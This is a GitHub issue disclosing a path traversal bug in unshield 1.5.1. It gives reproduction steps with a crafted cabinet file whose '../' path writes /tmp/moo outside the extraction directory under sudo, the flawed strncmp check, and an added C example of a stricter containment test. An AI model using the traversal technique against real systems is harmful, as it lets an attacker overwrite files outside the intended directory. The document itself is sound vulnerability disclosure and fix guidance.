Path traversal bug in src/unshield.c #171

Open
eqawasm opened this issue May 16, 2023 · 1 comment
eqawasm commented May 16, 2023

Impact:

The latest version, 1.5.1, has a path traversal vulnerability that, with root permission, allows the attacker to create or write to files outside the current directory, due to improper string comparisons between real paths.

How to reproduce:

```console
$ wget -O unshield-1.5.1.tar.gz https://github.com/twogood/unshield/archive/refs/tags/1.5.1.tar.gz
$ tar -xzf unshield-1.5.1.tar.gz
$ cd unshield-1.5.1
$ cmake .
$ make
$ make install
# download cab and hdr files from https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=776193
# must be located together in the same directory
$ cd /
$ sudo mkdir tm
$ cd tm
$ ls /tmp/moo
ls: cannot access /tmp/moo: No such file or directory

$ sudo /home/path/to/unshield-1.5.1/src/unshield x /path/to/data1.cab
Cabinet: data1.cab
  extracting: ./Bovine_Files/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/moo
--------  -------
     1 files

# verify attack worked
$ ls /tmp/moo
/tmp/moo
```

Root cause:

unshield/src/unshield.c

Lines 494 to 506 in 67bca73

```c
realpath(output_directory, real_output_directory);
realpath(filename, real_filename);
if (real_filename == NULL || strncmp(real_filename,
                                     real_output_directory,
                                     strlen(real_output_directory)) != 0)
{
    fprintf(stderr, "\n\nExtraction failed.\n");
    fprintf(stderr, "Error: %s (%d).\n", strerror(errno), errno);
    fprintf(stderr, "Possible directory traversal attack for: %s\n", filename);
    fprintf(stderr, "To be placed at: %s\n\n", real_filename);
    success = false;
    goto exit;
}
```

The root cause is the return value of the strncmp call in src/unshield.c, which passes the if condition in the extract_file function.

PoC image:

download data1.cab and data1.hdr from https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=776193
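To make the root cause concrete: the check above compares only the first strlen(real_output_directory) bytes of the resolved target path, so an output directory of /tm is accepted as a prefix of /tmp/moo, which is exactly what the reproduction steps exercise. The following is an added example, not code from the unshield project or from the reporter. It places the bare prefix comparison beside a hardened variant that additionally requires the byte after the directory prefix to be a path separator or the end of the string. Both functions assume their inputs are already the absolute, "."- and ".."-free output of realpath(); the path strings are constructed inline, so the program runs without touching the filesystem, and the function names are this example's own.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * Added example (not unshield code). Both arguments are assumed to be
 * already-resolved absolute paths, as realpath() would return them, so the
 * only question left is the containment test itself.
 */

/* Same test as unshield 1.5.1 extract_file(): a bare prefix comparison. */
bool inside_dir_prefix_only(const char *real_dir, const char *real_file)
{
    return strncmp(real_file, real_dir, strlen(real_dir)) == 0;
}

/*
 * Hardened test: after the directory prefix the file path must either end
 * or continue with '/', so "/tm" no longer matches "/tmp/moo". Trailing
 * slashes on the directory are ignored, and a root directory of "/" is
 * treated as containing every absolute path.
 */
bool inside_dir_strict(const char *real_dir, const char *real_file)
{
    size_t n = strlen(real_dir);

    while (n > 1 && real_dir[n - 1] == '/')   /* "/tm/" is compared as "/tm" */
        n--;

    if (strncmp(real_file, real_dir, n) != 0)
        return false;

    if (n == 1 && real_dir[0] == '/')         /* output directory is "/" */
        return real_file[0] == '/';

    return real_file[n] == '\0' || real_file[n] == '/';
}

int main(void)
{
    /* Constructed cases; the first row is the pair from this issue's PoC. */
    static const struct { const char *dir, *file; } cases[] = {
        { "/tm",  "/tmp/moo" },                 /* traversal: sibling directory */
        { "/tm",  "/tmx" },                     /* traversal: sibling file */
        { "/tm",  "/tm/Bovine_Files/a.txt" },   /* legitimate */
        { "/tm/", "/tm/Bovine_Files/a.txt" },   /* legitimate, trailing slash */
        { "/tm",  "/tm" },                      /* the directory itself */
        { "/",    "/tmp/moo" },                 /* extracting directly into / */
    };
    size_t i;

    for (i = 0; i < sizeof cases / sizeof cases[0]; i++)
        printf("%-5s %-25s prefix_only=%d strict=%d\n",
               cases[i].dir, cases[i].file,
               inside_dir_prefix_only(cases[i].dir, cases[i].file),
               inside_dir_strict(cases[i].dir, cases[i].file));
    return 0;
}
```

Run as-is, the first row shows the bug: the prefix-only test accepts /tmp/moo under /tm while the strict test rejects it, and the remaining rows show the strict test still accepting everything that genuinely lives under the output directory. A fix in extract_file should also use realpath()'s return value: the snippet quoted above calls `realpath(filename, real_filename)` without assigning the result, and if real_filename is a fixed buffer, as that call suggests, the `real_filename == NULL` test can never fire, so a failed resolution is not detected.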

twogood (Owner) commented May 16, 2023

Thanks! PR is welcome!
